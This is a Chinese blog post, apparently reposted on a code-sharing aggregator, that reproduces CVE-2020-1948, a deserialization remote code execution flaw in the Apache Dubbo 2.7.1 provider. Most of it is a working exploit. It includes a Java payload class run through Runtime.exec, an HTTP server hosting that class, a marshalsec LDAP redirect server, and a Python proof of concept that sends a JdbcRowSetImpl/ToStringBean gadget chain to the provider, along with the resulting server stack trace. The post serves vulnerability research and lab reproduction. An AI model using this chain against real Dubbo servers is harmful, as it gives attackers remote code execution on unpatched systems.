ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

[CVE-2020-1948]Apache Dubbo Provider默认反序列化RCE

2020-06-26 12:40:23  阅读:545  来源: 互联网

标签:Dubbo 1948 java dubbo 1.8 ExploitMac 131 序列化 2.7


git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1

# 将整个项目dubbo-spring-boot-project导入IDEA
在dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml

引入以下依赖:

        <dependency>
            <groupId>com.rometools</groupId>
            <artifactId>rome</artifactId>
            <version>1.7.0</version>
        </dependency>

修改默认端口:dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties
为12347

ExploitMac.java

public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}

terminal 1

[~/Downloads]$ cat ExploitMac.java                                                                                                [23:55:12]
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
[~/Downloads]$ vi ExploitMac.java                                                                                                 [23:43:04]
[~/Downloads]$ javac ExploitMac.java                                                                                              [23:43:17]
[~/Downloads]$ python3 -m http.server 8088                                                                                        [23:43:19]
zsh: correct 'http.server' to 'httpserver' [nyae]? n
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...

127.0.0.1 - - [23/Jun/2020 23:49:27] "GET /ExploitMac.class HTTP/1.1" 200 -

terminal 2

[master][~/GitProjects/marshalsec]$ java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/#ExploitMac 8087
Listening on 0.0.0.0:8087
Send LDAP reference result for ExploitMac redirecting to http://127.0.0.1:8088/ExploitMac.class

terminal 3

$ python3 -m pip install dubbo-py
$ python3 dubbo3.py

PoC

from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient

client = DubboClient('127.0.0.1', 12347)

JdbcRowSetImpl=new_object(
      'com.sun.rowset.JdbcRowSetImpl',
      dataSource="ldap://127.0.0.1:8087/ExploitMac",
      strMatchColumns=["foo"]
      )
JdbcRowSetImplClass=new_object(
      'java.lang.Class',
      name="com.sun.rowset.JdbcRowSetImpl",
      )
toStringBean=new_object(
      'com.rometools.rome.feed.impl.ToStringBean',
      beanClass=JdbcRowSetImplClass,
      obj=JdbcRowSetImpl
      )

resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
    method_name='rce',
    args=[toStringBean])

IDEA报错

2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean  : Error while generating toString

java.lang.reflect.InvocationTargetException: null
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:1.8.0_131]
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[na:1.8.0_131]
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:1.8.0_131]
	at java.lang.reflect.Method.invoke(Method.java:498) ~[na:1.8.0_131]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:129) [rome-1.7.0.jar:1.7.0]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.util.Arrays.toString(Arrays.java:4571) [na:1.8.0_131]
	at org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.lang.StringBuilder.append(StringBuilder.java:131) [na:1.8.0_131]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:103) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:200) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:51) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:57) [dubbo-2.7.1.jar:2.7.1]
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) [na:1.8.0_131]
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) [na:1.8.0_131]
	at java.lang.Thread.run(Thread.java:748) [na:1.8.0_131]
Caused by: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
	at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]
	at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004) ~[na:1.8.0_131]
	... 20 common frames omitted

Wireshak:8087

在这里插入图片描述

Wireshak:12347

在这里插入图片描述

Demo

在这里插入图片描述

参考

  • https://mp.weixin.qq.com/s/iKQbdWrMG00Arg0aEUbrXQ
  • https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html

标签:Dubbo,1948,java,dubbo,1.8,ExploitMac,131,序列化,2.7
来源: https://blog.csdn.net/caiqiiqi/article/details/106934770

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有